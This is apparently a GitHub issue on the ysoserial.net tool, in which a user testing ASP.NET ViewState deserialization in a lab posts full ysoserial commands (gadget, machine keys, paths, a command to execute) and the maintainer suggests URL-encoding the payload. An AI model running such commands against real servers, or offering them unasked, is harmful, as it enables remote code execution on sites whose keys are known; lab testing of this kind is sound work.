Constantly encountering FormatException: Invalid length for a Base-64 char array or string.
deathalliance opened this issue · comments
Hello,
I'm trying the code execution vulnerability in a lab environment where the validation key and decryption keys are known. Unfortunately, I cannot get it to work no matter what I try.
I'm using .NET 4.0.
I've tried both by setting the ViewStateGenerator and through setting the app path (and I confirm that the ViewStateGenerator value is correct). I have also tried appending ='s at the end of the generated code. I've also tried URL encoding the generated viewstate that I send through the POST request.
Nothing works. I can't even get a single echo 123 > c:\windows\temp\test.txt
working. What am I doing wrong?
(I know it should throw a 500 exception, but it should also create test.txt which it doesn't)
Here are some of the codes I have tried:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --apppath="/p" --path="/p/default.aspx" --islegacy --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5" --isdebug
Also tried with giving both keys:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/p/default.aspx" --apppath="/p" --decryptionalg="Auto" --decryptionkey="9419E035D0FF7D8038D0DA7A21AFB4482C82E939147FB1C1B1F7EBCDDC69B617" --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5"
The generator code for the above path is 333BF894
Thanks!
I am guessing here but I think it can be because of lack of URL-encoding and the fact that it converts the +
character to space if it has not been encoded.
I will close it for now but feel free to comment to re-open it if it has nothing to do with URL-encoding. I will also try to add URLencoding to the output by default in the next version.